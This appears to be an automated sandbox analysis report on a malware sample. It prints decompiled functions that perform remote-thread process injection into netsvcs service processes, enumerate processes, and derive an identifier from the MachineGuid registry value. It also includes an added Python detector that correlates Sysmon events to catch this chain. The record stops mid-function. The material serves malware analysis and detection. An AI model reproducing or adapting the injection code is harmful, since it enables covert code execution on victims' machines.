                                                                                    • Instruction ID: 8b85882c598f52452c64ae6cb6e7c9234d90b236a488aa23b342e5ae57f3738c
                                                                                    • Opcode Fuzzy Hash: a6f9bc82d9bbb387fb87d8ebf049f3e642d4f20b2fb01ddc504f8ffd2808dc32
                                                                                    • Instruction Fuzzy Hash: 51513831B41308BBE724ABA5AD46FBE7369DFC4B15F201159FE09A71C0DEA4BD028B54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 50%
                                                                                    			E04EC8FD0(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi, long _a4) {
                                                                                    				signed int _v8;
                                                                                    				char _v28;
                                                                                    				char _v32;
                                                                                    				long _v36;
                                                                                    				void* _v40;
                                                                                    				signed int _v44;
                                                                                    				void* _v48;
                                                                                    				void* _v52;
                                                                                    				void* _v92;
                                                                                    				signed int _t52;
                                                                                    				void* _t60;
                                                                                    				struct _SECURITY_ATTRIBUTES* _t68;
                                                                                    				_Unknown_base(*)()* _t70;
                                                                                    				_Unknown_base(*)()* _t72;
                                                                                    				void* _t73;
                                                                                    				_Unknown_base(*)()* _t81;
                                                                                    				signed int _t82;
                                                                                    				signed int _t83;
                                                                                    				void* _t84;
                                                                                    				signed int _t87;
                                                                                    				signed int _t89;
                                                                                    				void* _t93;
                                                                                    				long _t102;
                                                                                    				long _t104;
                                                                                    				signed int _t118;
                                                                                    				signed int _t127;
                                                                                    				signed int _t128;
                                                                                    				void* _t133;
                                                                                    				void* _t135;
                                                                                    				signed int _t136;
                                                                                    				long _t138;
                                                                                    				void* _t139;
                                                                                    				signed int _t142;
                                                                                    				signed int _t144;
                                                                                    				void* _t146;
                                                                                    				void* _t147;
                                                                                    
                                                                                    				_t144 = (_t142 & 0xfffffff8) - 0x34;
                                                                                    				_t52 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t52 ^ _t144;
                                                                                    				_push(__ebx);
                                                                                    				_t104 = _a4;
                                                                                    				_push(__esi);
                                                                                    				_push(__edi);
                                                                                    				_t138 = __ecx;
                                                                                    				_v52 = __edx;
                                                                                    				_v32 = 0;
                                                                                    				if(GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege") == 0) {
                                                                                    					if(E04ECAA70(_t138) != 0) {
                                                                                    						goto L2;
                                                                                    					} else {
                                                                                    						goto L17;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t102 = RtlAdjustPrivilege(0x14, 1, 0,  &_v36); // executed
                                                                                    					if(_t102 < 0) {
                                                                                    						L17:
                                                                                    						return E04ED572E(_v8 ^ _t144);
                                                                                    					} else {
                                                                                    						L2:
                                                                                    						_t139 = OpenProcess(0x43a, 0, _t138);
                                                                                    						if(_t139 == 0) {
                                                                                    							goto L17;
                                                                                    						} else {
                                                                                    							_t60 = E04EC5920(); // executed
                                                                                    							if(_t60 == 0) {
                                                                                    								L18:
                                                                                    								_t133 = VirtualAllocEx(_t139, 0, _t104, 0x3000, 0x40);
                                                                                    								_v44 = _t133;
                                                                                    								if(_t133 != 0) {
                                                                                    									if(WriteProcessMemory(_t139, _t133, _v52, _t104,  &_v36) != 0 && _v36 == _t104) {
                                                                                    										_t68 = E04EC5C00(_t133);
                                                                                    										if(_t68 != 0) {
                                                                                    											L24:
                                                                                    											_t70 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlCreateUserThread");
                                                                                    											if(_t70 == 0) {
                                                                                    												L26:
                                                                                    												_v48 = 0;
                                                                                    												_t72 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateThreadEx");
                                                                                    												if(_t72 != 0) {
                                                                                    													 *_t72( &_v48, 0x1fffff, 0, _t139, _v44, 0, 0, 0, 0, 0, 0);
                                                                                    												}
                                                                                    												_t73 = _v48;
                                                                                    												_t135 = _t73;
                                                                                    												if(_t73 != 0) {
                                                                                    													goto L29;
                                                                                    												}
                                                                                    											} else {
                                                                                    												_v52 = 0;
                                                                                    												 *_t70(_t139, 0, 0, 0, 0, 0, _t133, 0,  &_v52, 0);
                                                                                    												_t135 = _v92;
                                                                                    												if(_t135 != 0) {
                                                                                    													goto L29;
                                                                                    												} else {
                                                                                    													goto L26;
                                                                                    												}
                                                                                    											}
                                                                                    										} else {
                                                                                    											_t135 = CreateRemoteThread(_t139, _t68, _t68, _t133, _t68, _t68, _t68);
                                                                                    											if(_t135 != 0) {
                                                                                    												L29:
                                                                                    												WaitForSingleObject(_t135, 0xffffffff);
                                                                                    												CloseHandle(_t135);
                                                                                    												_v36 = 1;
                                                                                    											} else {
                                                                                    												_t133 = _v48;
                                                                                    												goto L24;
                                                                                    											}
                                                                                    										}
                                                                                    										_t133 = _v44;
                                                                                    									}
                                                                                    									VirtualFreeEx(_t139, _t133, _t104, 0x4000);
                                                                                    								}
                                                                                    							} else {
                                                                                    								_v48 = 0;
                                                                                    								_t81 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                    								if(_t81 != 0) {
                                                                                    									 *_t81(_t139,  &_v48);
                                                                                    								}
                                                                                    								if(_v48 != 0) {
                                                                                    									goto L18;
                                                                                    								} else {
                                                                                    									_t127 = _t104;
                                                                                    									_t82 = E04EC8C20(_t139, _t127); // executed
                                                                                    									_t136 = _t82;
                                                                                    									_t144 = _t144 - 0x10 + 0x10;
                                                                                    									_t83 = _t127;
                                                                                    									_v44 = _t83;
                                                                                    									if((_t136 | _t83) != 0) {
                                                                                    										_t128 = _v52;
                                                                                    										_t118 = _t139;
                                                                                    										_t84 = E04EC8E80(_t118, _t128, _t136, _t83, _t104,  &_v40);
                                                                                    										_t146 = _t144 + 0x10;
                                                                                    										if(_t84 != 0 && _v40 == _t104) {
                                                                                    											_v48 = 0;
                                                                                    											_t87 = E04EC8B50(_t104, "RtlCreateUserThread", _t128, _t136, _t139, E04EC8350(_t118), _t128);
                                                                                    											_v40 = _t87;
                                                                                    											_t147 = _t146 + 8;
                                                                                    											_v52 = _t128;
                                                                                    											_t118 = _t87 | _t128;
                                                                                    											if(_t118 == 0) {
                                                                                    												L12:
                                                                                    												_v40 = 0;
                                                                                    												_t89 = E04EC8B50(_t104, "NtCreateThreadEx", _t128, _t136, _t139, E04EC8350(_t118), _t128);
                                                                                    												_v36 = _t89;
                                                                                    												_t146 = _t147 + 8;
                                                                                    												_v52 = _t128;
                                                                                    												_t118 = _t89 | _t128;
                                                                                    												if(_t118 != 0) {
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(_v44);
                                                                                    													_push(_t136);
                                                                                    													asm("cdq");
                                                                                    													_push(_t128);
                                                                                    													_push(_t139);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													_push(0);
                                                                                    													asm("cdq");
                                                                                    													E04EC8170(_v36, _v52, 0xb,  &_v40, _t128, 0x1fffff);
                                                                                    													_t93 = _v40;
                                                                                    													_t146 = _t146 + 0x64;
                                                                                    													_v52 = _t93;
                                                                                    													if(_t93 != 0) {
                                                                                    														goto L14;
                                                                                    													}
                                                                                    												}
                                                                                    											} else {
                                                                                    												asm("cdq");
                                                                                    												_push(_t128);
                                                                                    												_push( &_v28);
                                                                                    												asm("cdq");
                                                                                    												_push(_t128);
                                                                                    												_push( &_v48);
                                                                                    												_push(0);
                                                                                    												_push(0);
                                                                                    												_push(_v44);
                                                                                    												_push(_t136);
                                                                                    												_push(0);
                                                                                    												_push(0);
                                                                                    												_push(0);
                                                                                    												_push(0);
                                                                                    												_push(0);
                                                                                    												_push(0);
                                                                                    												_push(0);
                                                                                    												_push(0);
                                                                                    												_push(0);
                                                                                    												asm("cdq");
                                                                                    												E04EC8170(_v40, _v52, 0xa, _t139, _t128, 0);
                                                                                    												_t93 = _v48;
                                                                                    												_t146 = _t147 + 0x5c;
                                                                                    												_v52 = _t93;
                                                                                    												if(_t93 != 0) {
                                                                                    													L14:
                                                                                    													WaitForSingleObject(_t93, 0xffffffff);
                                                                                    													FindCloseChangeNotification(_v52); // executed
                                                                                    													_v32 = 1;
                                                                                    												} else {
                                                                                    													goto L12;
                                                                                    												}
                                                                                    											}
                                                                                    										}
                                                                                    										_push(_t118);
                                                                                    										E04EC8D50(_t139, _t104, _t136, _v44);
                                                                                    										_t144 = _t146 + 0xc;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							CloseHandle(_t139);
                                                                                    							return E04ED572E(_v8 ^ _t144);
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32 ref: 04EC9003
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 04EC900B
                                                                                    • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 04EC9024
                                                                                    • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 04EC9036
                                                                                      • Part of subcall function 04EC5920: LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04ECBFAB), ref: 04EC5930
                                                                                      • Part of subcall function 04EC5920: GetProcAddress.KERNEL32(00000000), ref: 04EC5937
                                                                                      • Part of subcall function 04EC5920: GetNativeSystemInfo.KERNEL32(?), ref: 04EC5957
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EC9065
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC9068
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC91CF
                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 04EC91DE
                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,04ECBC35,00003000,00000040), ref: 04EC922B
                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,04ECBC35,?), ref: 04EC924B
                                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EC9273
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,RtlCreateUserThread), ref: 04EC9291
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC9298
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,NtCreateThreadEx), ref: 04EC92DB
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC92E2
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC9318
                                                                                    • VirtualFreeEx.KERNEL32(00000000,00000000,04ECBC35,00004000), ref: 04EC933A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc$CloseObjectProcessSingleVirtualWait$AdjustAllocChangeCreateFindFreeHandleInfoMemoryNativeNotificationOpenPrivilegeRemoteSystemThreadWrite
                                                                                    • String ID: IsWow64Process$NtCreateThreadEx$RtlAdjustPrivilege$RtlCreateUserThread$kernel32.dll$ntdll.dll
                                                                                    • API String ID: 2461120785-1625205875
                                                                                    • Opcode ID: 17f8af857cc16d5d41a3099f108a80e4cc78fd53aa6185c5269af594761bcb18
                                                                                    • Instruction ID: 722b38b70a16435917e764dc6d02d040037a43c586f686098809517f207e16f6
                                                                                    • Opcode Fuzzy Hash: 17f8af857cc16d5d41a3099f108a80e4cc78fd53aa6185c5269af594761bcb18
                                                                                    • Instruction Fuzzy Hash: BB91D3B1204301AFE714EF259D05F7B7AE9EFC4B19F10191DF954D2280EB74E9068BA6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
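The API list above is a classic remote-thread injection chain: RtlAdjustPrivilege(0x14) enables SeDebugPrivilege (SE_DEBUG_PRIVILEGE is 20), OpenProcess(0x43A) requests PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, VirtualAllocEx(..., 0x3000, 0x40) commits an RWX region (MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE), WriteProcessMemory copies the payload, and the code falls back from CreateRemoteThread to RtlCreateUserThread and then NtCreateThreadEx (with 0x1FFFFF = THREAD_ALL_ACCESS) before waiting on the thread and releasing the region with MEM_RELEASE (0x4000). The following detector is an added example written for this report, not code from the sandbox or the sample: it decodes the GrantedAccess mask of Sysmon-style ProcessAccess events, flags masks that carry the minimum rights this chain needs, and correlates such an open with a later CreateRemoteThread event from the same source into the same target. The event records, PIDs and start address are constructed for the example; the field names follow Sysmon Event ID 10 and 8 but the input is a plain list of dicts, not a real log parser.

```python
"""Added detection example for the injection chain listed in the APIs above.
The events below are constructed; they are not taken from the report."""

# Process access rights from winnt.h (the subset that matters for injection).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Mask the sample passes to OpenProcess, as recorded in the APIs list.
SAMPLE_OPENPROCESS_MASK = 0x43A

# Minimum rights the VirtualAllocEx / WriteProcessMemory / CreateRemoteThread
# chain needs: CREATE_THREAD | VM_OPERATION | VM_WRITE.
INJECTION_MIN = 0x0002 | 0x0008 | 0x0020


def decode_access(mask):
    """Return the names of the process rights set in mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def is_injection_capable(mask):
    """True if the handle could be used to write and start a thread in the target."""
    return mask & INJECTION_MIN == INJECTION_MIN


def find_injection_chains(events):
    """Correlate ProcessAccess (event_id 10) with CreateRemoteThread (event_id 8).

    events: iterable of dicts in time order with keys event_id, source_pid,
    target_pid and, for id 10, granted_access; for id 8, start_address.
    Returns (source_pid, target_pid, granted_access) tuples where an
    injection-capable handle open was followed by a remote thread into the
    same target from the same source.
    """
    opened = {}   # (source_pid, target_pid) -> granted_access of last capable open
    hits = []
    for ev in events:
        key = (ev["source_pid"], ev["target_pid"])
        if ev["event_id"] == 10 and is_injection_capable(ev["granted_access"]):
            opened[key] = ev["granted_access"]
        elif ev["event_id"] == 8 and key in opened:
            hits.append((key[0], key[1], opened[key]))
    return hits


# Constructed sample telemetry (hypothetical PIDs and addresses).
SAMPLE_EVENTS = [
    # A benign handle open: query + read only, no write or thread rights.
    {"event_id": 10, "source_pid": 1234, "target_pid": 624, "granted_access": 0x1410},
    # The pattern from this report: 0x43A open followed by a remote thread.
    {"event_id": 10, "source_pid": 4100, "target_pid": 624,
     "granted_access": SAMPLE_OPENPROCESS_MASK},
    {"event_id": 8, "source_pid": 4100, "target_pid": 624, "start_address": 0x2A0000},
    # A remote thread with no preceding capable open from that source (not flagged).
    {"event_id": 8, "source_pid": 1234, "target_pid": 624, "start_address": 0x7FF00000},
]


if __name__ == "__main__":
    print("0x43A =", " | ".join(decode_access(SAMPLE_OPENPROCESS_MASK)))
    for src, dst, mask in find_injection_chains(SAMPLE_EVENTS):
        print(f"injection chain: pid {src} -> pid {dst} (GrantedAccess 0x{mask:X})")
```

The correlation keys on the (source, target) pair rather than on the handle, so it also catches a sample that falls through to RtlCreateUserThread or NtCreateThreadEx, since both still surface as a CreateRemoteThread-class event in Sysmon. A production rule would additionally check that start_address does not fall inside an image-backed region of the target, which is the signal of the RWX allocation seen here.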

                                                                                    C-Code - Quality: 61%
                                                                                    			E04ECB9A0(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				char _v408;
                                                                                    				struct _QUERY_SERVICE_CONFIG* _v412;
                                                                                    				char _v416;
                                                                                    				short* _v420;
                                                                                    				char _v424;
                                                                                    				intOrPtr _v428;
                                                                                    				void* _v432;
                                                                                    				short* _v436;
                                                                                    				int _v440;
                                                                                    				intOrPtr _v444;
                                                                                    				intOrPtr _v448;
                                                                                    				signed int _t58;
                                                                                    				void* _t63;
                                                                                    				char _t68;
                                                                                    				void* _t69;
                                                                                    				void* _t71;
                                                                                    				intOrPtr _t72;
                                                                                    				void* _t79;
                                                                                    				void* _t80;
                                                                                    				int _t82;
                                                                                    				WCHAR* _t85;
                                                                                    				signed int _t87;
                                                                                    				void* _t101;
                                                                                    				long _t102;
                                                                                    				void* _t103;
                                                                                    				void* _t108;
                                                                                    				intOrPtr _t112;
                                                                                    				intOrPtr _t123;
                                                                                    				void* _t124;
                                                                                    				void* _t126;
                                                                                    				void* _t128;
                                                                                    				intOrPtr* _t132;
                                                                                    				signed int _t134;
                                                                                    				intOrPtr* _t137;
                                                                                    				signed int _t142;
                                                                                    				void* _t143;
                                                                                    				void* _t144;
                                                                                    
                                                                                    				_t124 = __edi;
                                                                                    				_t58 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t58 ^ _t142;
                                                                                    				_v448 = __edx;
                                                                                    				_v436 = 0;
                                                                                    				_v424 = 0;
                                                                                    				_v416 = 0;
                                                                                    				_v420 = 0;
                                                                                    				_v444 = __ecx;
                                                                                    				E04EDDAD0(__edi,  &_v408, 0, 0x190);
                                                                                    				_t144 = _t143 + 0xc;
                                                                                    				_t63 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                                                    				_t101 = _t63;
                                                                                    				_v412 = _t101;
                                                                                    				if(_t101 != 0) {
                                                                                    					_t132 = __imp__EnumServicesStatusExW;
                                                                                    					 *_t132(_t101, 0, 0x30, 1, 0, 0,  &_v424,  &_v416,  &_v420, 0, __esi);
                                                                                    					_t68 = _v424;
                                                                                    					if(_t68 != 0) {
                                                                                    						_push(_t124);
                                                                                    						_t102 = _t68 + 0x2c;
                                                                                    						_t69 = LocalAlloc(0x40, _t102); // executed
                                                                                    						_v432 = _t69;
                                                                                    						if(_t69 != 0) {
                                                                                    							_push(0);
                                                                                    							_v420 = 0;
                                                                                    							_push( &_v420);
                                                                                    							_push( &_v416);
                                                                                    							_push( &_v424);
                                                                                    							_push(_t102);
                                                                                    							_t103 = _v412;
                                                                                    							_push(_t69);
                                                                                    							_push(1);
                                                                                    							_push(0x30);
                                                                                    							_push(0);
                                                                                    							_push(_t103);
                                                                                    							if( *_t132() != 0) {
                                                                                    								_t71 = LocalAlloc(0x40, 0x2000);
                                                                                    								_t126 = CloseServiceHandle;
                                                                                    								_t108 = _t71;
                                                                                    								_t72 = 0;
                                                                                    								_v412 = _t108;
                                                                                    								_v440 = 0;
                                                                                    								_v428 = 0;
                                                                                    								if(_v416 > 0) {
                                                                                    									_t137 = _v432 + 0x24;
                                                                                    									asm("o16 nop [eax+eax]");
                                                                                    									do {
                                                                                    										if( *((intOrPtr*)(_t137 - 0x18)) == 4) {
                                                                                    											_t80 = OpenServiceW(_t103,  *(_t137 - 0x24), 1); // executed
                                                                                    											_t128 = _t80;
                                                                                    											if(_t128 == 0) {
                                                                                    												_t126 = CloseServiceHandle;
                                                                                    											} else {
                                                                                    												_t82 = QueryServiceConfigW(_t128, _v412, 0x2000,  &_v440); // executed
                                                                                    												if(_t82 == 0) {
                                                                                    													L21:
                                                                                    													_t126 = CloseServiceHandle;
                                                                                    													CloseServiceHandle(_t128);
                                                                                    												} else {
                                                                                    													_t85 =  *(_v412 + 0xc);
                                                                                    													if(_t85 != 0 && StrStrIW(_t85, L"-k netsvcs") != 0) {
                                                                                    														_t123 =  *_t137;
                                                                                    														_t87 = 0;
                                                                                    														asm("o16 nop [eax+eax]");
                                                                                    														while(1) {
                                                                                    															_t112 =  *((intOrPtr*)(_t142 + _t87 * 4 - 0x194));
                                                                                    															if(_t112 == _t123) {
                                                                                    																goto L21;
                                                                                    															}
                                                                                    															if(_t112 == 0) {
                                                                                    																 *((intOrPtr*)(_t142 + _t87 * 4 - 0x194)) = _t123;
                                                                                    																goto L21;
                                                                                    															} else {
                                                                                    																_t87 = _t87 + 1;
                                                                                    																if(_t87 < 0x64) {
                                                                                    																	continue;
                                                                                    																} else {
                                                                                    																	_t126 = CloseServiceHandle;
                                                                                    																	CloseServiceHandle(_t128);
                                                                                    																}
                                                                                    															}
                                                                                    															goto L23;
                                                                                    														}
                                                                                    													}
                                                                                    													goto L21;
                                                                                    												}
                                                                                    											}
                                                                                    											L23:
                                                                                    											_t72 = _v428;
                                                                                    										}
                                                                                    										_t72 = _t72 + 1;
                                                                                    										_t137 = _t137 + 0x2c;
                                                                                    										_v428 = _t72;
                                                                                    									} while (_t72 < _v416);
                                                                                    									_t108 = _v412;
                                                                                    								}
                                                                                    								LocalFree(_t108);
                                                                                    								LocalFree(_v432);
                                                                                    								CloseServiceHandle(_t103);
                                                                                    								_t134 = 0;
                                                                                    								while(1) {
                                                                                    									_t109 =  *((intOrPtr*)(_t142 + _t134 * 4 - 0x194));
                                                                                    									if( *((intOrPtr*)(_t142 + _t134 * 4 - 0x194)) == 0) {
                                                                                    										break;
                                                                                    									}
                                                                                    									_t122 = _v444;
                                                                                    									if(_v444 != 0) {
                                                                                    										_t78 = _v448;
                                                                                    										if(_v448 != 0) {
                                                                                    											_t79 = E04EC8FD0(_t103, _t109, _t122, _t126, _t134, _t78); // executed
                                                                                    											_t144 = _t144 + 4;
                                                                                    											if(_t79 != 0) {
                                                                                    												_v436 = _v436 + 1;
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    									_t134 = _t134 + 1;
                                                                                    									if(_t134 < 0x64) {
                                                                                    										continue;
                                                                                    									}
                                                                                    									break;
                                                                                    								}
                                                                                    								return E04ED572E(_v8 ^ _t142);
                                                                                    							} else {
                                                                                    								CloseServiceHandle(_t103);
                                                                                    								LocalFree(_v432);
                                                                                    								return E04ED572E(_v8 ^ _t142);
                                                                                    							}
                                                                                    						} else {
                                                                                    							CloseServiceHandle(_v412);
                                                                                    							return E04ED572E(_v8 ^ _t142);
                                                                                    						}
                                                                                    					} else {
                                                                                    						CloseServiceHandle(_t101);
                                                                                    						return E04ED572E(_v8 ^ _t142);
                                                                                    					}
                                                                                    				} else {
                                                                                    					return E04ED572E(_v8 ^ _t142);
                                                                                    				}
                                                                                    			}


APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?), ref: 04ECB9F8
• EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,00000000,?,?,?,00000000,00000000,?,?,?), ref: 04ECBA42
• CloseServiceHandle.ADVAPI32(00000000,?,?,?), ref: 04ECBA4F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Yara matches
Similarity
• API ID: CloseEnumHandleManagerOpenServiceServicesStatus
• String ID: -k netsvcs
• API String ID: 236840872-1604415765
• Opcode ID: 691213fa41972a8e461e694f27eb744b7cf55d5f7ed02e46527f6fe43c68b169
• Instruction ID: 66b69ee84c0bd501b09669030a74dca545ed5c8187cc22007d1f0bddde9505de
• Opcode Fuzzy Hash: 691213fa41972a8e461e694f27eb744b7cf55d5f7ed02e46527f6fe43c68b169
• Instruction Fuzzy Hash: 89718E71B01218AFEB24DF25AD51BEAB7B8EF49305F1010EAE909E7244DB74BE418F50
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32(?,74E04DC0), ref: 04EC5C75
• CreateToolhelp32Snapshot.KERNEL32 ref: 04EC5C8B
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 04EC5CA5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 04EC5CC6
• FindCloseChangeNotification.KERNEL32(00000000), ref: 04EC5CDC
Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Yara matches
Similarity
• API ID: Process32$ChangeCloseCreateCurrentFindFirstNextNotificationProcessSnapshotToolhelp32
• String ID:
• API String ID: 1594840063-0
• Opcode ID: 79a4b2eec01f7efd64033c5b9fefc262c44604b2b8d3da32a2dce471a047bbd0
• Instruction ID: 20dae9ee766b45cf0f43052943e0728cd8293a0283096d66236115f86debd545
• Opcode Fuzzy Hash: 79a4b2eec01f7efd64033c5b9fefc262c44604b2b8d3da32a2dce471a047bbd0
• Instruction Fuzzy Hash: B9012D70A02228ABD720EB65ED88BADB7F8EB45315F1001D9E808D2240DB38AE45CF65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
			E04EC6010(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				short _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				short _v176;
				char _v252;
				void* _v256;
				int _v260;
				intOrPtr _v264;
				int _v268;
				signed int _t110;
				long _t117;
				intOrPtr _t118;
				signed int _t119;
				intOrPtr* _t142;
				void* _t144;
				signed int _t145;
				signed int _t147;
				signed short* _t156;
				signed int _t166;
				intOrPtr* _t169;
				signed int _t171;
				void* _t173;
				signed int _t175;

				// __ecx = UTF-16 key string, __edx = output buffer (callee writes the derived string there)
				_t110 =  *0x4f03008; // 0x3d21fb31  (stack cookie)
				_v8 = _t110 ^ _t175;
				_v264 = __edx;
				_v12 = 0;
				// Stack-built UTF-16 template, two characters per 32-bit store:
				// "{G657YS06-016D-4C0R-6022-FGE2C32667F}" (GUID-shaped placeholder)
				_v88 = 0x47007b;
				_t142 = __ecx;
				_v84 = 0x350036;
				_v80 = 0x590037;
				_v76 = 0x300053;
				_v72 = 0x2d0036;
				_v68 = 0x310030;
				_v64 = 0x440036;
				_v60 = 0x34002d;
				_v56 = 0x300043;
				_v52 = 0x2d0052;
				_v48 = 0x300036;
				_v44 = 0x320032;
				_v40 = 0x46002d;
				_v36 = 0x450047;
				_v32 = 0x430032;
				_v28 = 0x320033;
				_v24 = 0x360032;
				_v20 = 0x370036;
				_v16 = 0x7d0046;
				_v260 = 0x4a; // expected value size: 37 UTF-16 chars (36-char GUID + terminator)
				// Stack-built UTF-16 key path: "SOFTWARE\Microsoft\Cryptography"
				_v176 = 0x4f0053;
				_v172 = 0x540046;
				_v168 = 0x410057;
				_v164 = 0x450052;
				_v160 = 0x4d005c;
				_v156 = 0x630069;
				_v152 = 0x6f0072;
				_v148 = 0x6f0073;
				_v144 = 0x740066;
				_v140 = 0x43005c;
				_v136 = 0x790072;
				_v132 = 0x740070;
				_v128 = 0x67006f;
				_v124 = 0x610072;
				_v120 = 0x680070;
				_v116 = 0x79;
				// Stack-built UTF-16 value name: "MachineGuid"
				_v112 = 0x61004d;
				_v108 = 0x680063;
				_v104 = 0x6e0069;
				_v100 = 0x470065;
				_v96 = 0x690075;
				_v92 = 0x64;
				E04EDDAD0(__edi,  &_v252, 0, 0x4a); // memset(value buffer, 0, 0x4a)
				_v256 = 0;
				// HKEY_LOCAL_MACHINE (0x80000002), KEY_READ | KEY_WOW64_64KEY (0x20119)
				_t117 = RegOpenKeyExW(0x80000002,  &_v176, 0, 0x20119,  &_v256); // executed
				if(_t117 == 0) {
					RegQueryValueExW(_v256,  &_v112, 0,  &_v268,  &_v252,  &_v260); // executed
					_t174 =  ==  ? 1 : 0; // comparison operands dropped by the decompiler
					RegCloseKey(_v256);
					_t180 =  ==  ? 1 : 0;
					if(( ==  ? 1 : 0) != 0 && _v260 == 0x4a) {
						// Value read with the expected size: copy the 74-byte MachineGuid
						// over the template body, starting just after the leading '{'
						asm("movups xmm0, [ebp-0xf8]");
						asm("movups [ebp-0x52], xmm0");
						asm("movups xmm0, [ebp-0xe8]");
						asm("movups [ebp-0x42], xmm0");
						asm("movups xmm0, [ebp-0xd8]");
						asm("movups [ebp-0x32], xmm0");
						asm("movups xmm0, [ebp-0xc8]");
						asm("movups [ebp-0x22], xmm0");
						asm("movq xmm0, [ebp-0xb8]");
						asm("movq [ebp-0x12], xmm0");
					}
				}
				// wcslen(key): _t171 = number of UTF-16 characters in the key
				_t169 = _t142;
				_t144 = _t169 + 2;
				do {
					_t118 =  *_t169;
					_t169 = _t169 + 2;
				} while (_t118 != 0);
				_t166 = 1;
				_t171 = _t169 - _t144 >> 1;
				asm("o16 nop [eax+eax]");
				// Transform template characters 1..0x24 (everything between the braces):
				// upper-case a-z, leave '-' alone, XOR the rest with key[i % keylen],
				// then fold the result back into the 0-9 / A-Z range
				do {
					_t119 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
					if(_t119 >= 0x61 && _t119 <= 0x7a) {
